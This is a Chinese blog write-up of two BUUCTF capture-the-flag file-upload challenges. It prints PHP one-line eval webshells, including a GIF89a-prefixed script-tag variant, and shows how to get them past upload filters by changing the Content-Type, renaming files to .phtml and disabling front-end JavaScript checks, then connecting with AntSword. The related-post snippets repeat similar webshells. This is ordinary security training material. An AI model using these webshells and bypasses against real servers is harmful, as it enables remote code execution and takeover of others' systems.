BUUCTF Web [极客大挑战 2019]Upload & [ACTF2020 新生赛]Upload

已于 2022-12-08 11:53:46 修改
阅读量575 收藏 1
点赞数 1
分类专栏: BUUCTF Web 文章标签: 安全
于 2022-08-31 16:18:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126619149
版权

目录

[极客大挑战 2019]Upload

[ACTF2020 新生赛]Upload

[极客大挑战 2019]Upload

1.启动靶机,发现是一个文件上传的框,先尝试上传shell.php,(需要burp抓包后更改文件名后缀为jpg,更改content-type为image/jpeg)但是上传失败,再上传一个写入一句话木马的jpg文件

<?php
@eval($_REQUEST[1]);
?>

2. 看来有对于木马的过滤机制,那就再写一个shell1.php文件,写入:

<scirpt language="pHp">@eval([1])</script>

再次上传(burp操作和上步相同)

看来不仅仅是校验文件后缀名和content-type,看来需要构造图片马了

3.上传图片马,新建一个php文档,写入

GIF89a?
<script language="pHp">eval($_REQUEST[1])</script>

 上传,burp抓包,把后缀名和type改成如下字段。(后缀名采用的是黑名单绕过方式)

Content-Disposition: form-data; name="file"; filename="tupianma.phtml"
Content-Type: image/jpeg

上传成功

访问一下/upload/tupianma.phtml   发现没有报404,直接复制到蚁剑连接

 拿到flag                 flag{fe625672-c185-4e78-87f8-b93acdebcaeb}

[ACTF2020 新生赛]Upload

启动靶机,鼠标移动到灯泡位置,发现文件上传点,直接上传shell.php

 看来限制了白名单,但是发现页面并没有加载信息,所以应该是前端校验

直接禁用js(新建页面,搜索about:config,在页面中找到javascript.enabled,把true给成false)

再次上传shell.php

 上传失败,看来后端也有校验,尝试把php后缀改成phtml试试

成功了,直接访问标橙的地址,发现是个空白页,看来有戏,直接蚁剑连接

 

拿到flag                   flag{3d2bc5ef-cd50-4e2c-92b5-fa5c010e2f25}

WmVicmE=
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ACTF2020 新生]Upload 1和[GXYCTF2019]Ping Ping Ping 1
qq_44122254的博客
02-16 265
打开靶场环境,发现是文件上传 检查前后端效验情况,检查源代码 存在前端效验,删除前端效验代码进行上传,后端也存在效验,过滤php文件,可选择phtml文件进行上传,写入phtml文件进行上传抓包看看 代码详情如下: 蚁剑连接查看flag [GXYCTF2019]Ping Ping Ping 1 打开靶场显示IP? 进行Linux查看,查看发现有空格过滤, 百度一波,空格过滤的绕过情况 有:%20(space)、%09(tab)、$IFS9、9、9、{IFS}$9、 {IFS}、IFS 都可以 进行
BUUCTF---[极客挑战 2019]Upload1
2201_75556700的博客
03-03 581
2.点开链接,需要上传文件,要求是image,上传文件后缀为jpg的一句话木马,发现被检测到了。4.接下来使用bp抓包修改包的后缀为phtml,5.接下来使用蚁剑链接。3.换另一个木马试试。
buuctf-[极客挑战 2019]Upload1
m0_62094846的博客
12-07 246
上传php,jpg,png,gif都报错 然后看wp GIF89a? <script language="php">eval($_REQUEST[feng])</script> 用这一串GIF89a伪造gif文件就行 真的上传不了假的上传成功了,就满脸问号 把后缀名改成phtml 因为没告诉文件上传后的位置,就要猜测,做这么多题,一般都是在upload里面 upload+文件名 ...
[ACTF2020 新生]Upload--BUUCTF
最新发布
XiaoYeZhu_1314的博客
04-24 337
得到:Upload Success!第二步:使用bp抓上传jpg文件的包,在修改文件后缀名为phtml。第一步:上传php文件,他提示,只能上传jpg、png、gif。第四步:拼接访问,连接蚁剑,找到flag。第三步:进行放过,在访问浏览器。
BUUCTF——[极客挑战 2019]Upload 1
qq_53175607的博客
12-04 2660
1.打开后发现是文件上传题 构建一句话木马 <?php @eval($_POST['shy']);?> 将一句话木马改成jpg文件尝试上传。 抓包改成php 提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头 2.然后和一步骤一样上传 ...
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1335
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)
Onlyone_1314的博客
11-23 4591
目录标题(1)把οnchange="check();去掉(2)禁用浏览器的JS脚本运行(3)Burp Suite抓包修改文件后缀名POST方法一句话木马GET方法一句话木马蚁剑连接 打开题目地址: 是一个文件上传的题目 选择一个一句话脚本上传: 前端存在JS代码校验文件类型,如果上传的文件后缀不是jpg和png,就会让上传按钮变得不使能: 要绕过前端的JS代码校验,常见的方法有: (1)把οnchange="check();去掉 可以直接把οnchange="check();去掉,这样提交文件的时候就
js文件上传_CTF从入门到提升(九)文件上传以及相关例题分享
weixin_39786850的博客
12-03 260
点击上方蓝色字体,关注我们文件上传主要是配合一些漏洞的利用,普遍意义上的文件上传是指将信息从个人计算机传送至中央计算机,也就是我们所说的远程计算机,对站点来说,就是传到运行网站的服务器上。一般网站都有自己的逻辑,比如在网站的注册页面,你想要上传个头像,网站只需要你上传头像,而不是传其他类型的文件。CTF上传文件的目的是为了get shell,我们最终目的是拿到题目的flag,如果说存在一...
Jeopardy-Writeups:SniperOJ的CTF挑战
05-18
SniperOJ的挑战文章和源代码描述平台源代码: : 挑战的Dockerfiles: : 挑战性 .├── forensics│ └── forensics100-You_Sha_Bi├── misc│ ├── misc100-baso4│ ├── misc100-md5-collision│ ├─...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体...通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对煤层的影响作用。
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成...对于经验丰富的工程师,这可能是一个有趣的项目,可以挑战他们的硬件设计和软件优化技能。总之,这个程序提供了学习和实践光立方制作的宝贵资源。
buuctf-[ACTF2020 新生]Upload(小宇特详解)
小宇的web博客
01-15 2788
buuctf-[ACTF2020 新生]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
BUUCTFUpload [极客挑战 2019]
金 帛的博客
04-19 1239
BUUCTF的WP
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1879
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF-[ACTF2020 新生]Upload1
Monica的博客
09-22 1590
目录 题目: 分析: 题目: 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞 分析: 先随便上传一个文件,发现提示 并且bp抓包并没有抓到包,说明为前端检测过滤。 那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。 先上传一个jpg文件,内容为<?php phpinfo();?>。 发现后端还是进行了检查过滤 那就试试其他几种后缀: 绕过后缀的有文件格式有php,php3,php...
[actf2020 新生]include
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全。该比旨在通过一系列的挑战来测试参者的网络安全技能,包括密码学、漏洞利用、逆向工程等等。 而 "include" 是一个在编程中经常使用的指令,它用于将一个文件的内容插入到另一个文件中。在 C 语言中,"include" 常用于引入头文件,以便在当前文件中使用另一个文件中定义的函数、变量等。 希望我的回答能够解决您的疑惑,如果您有任何其他问题,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值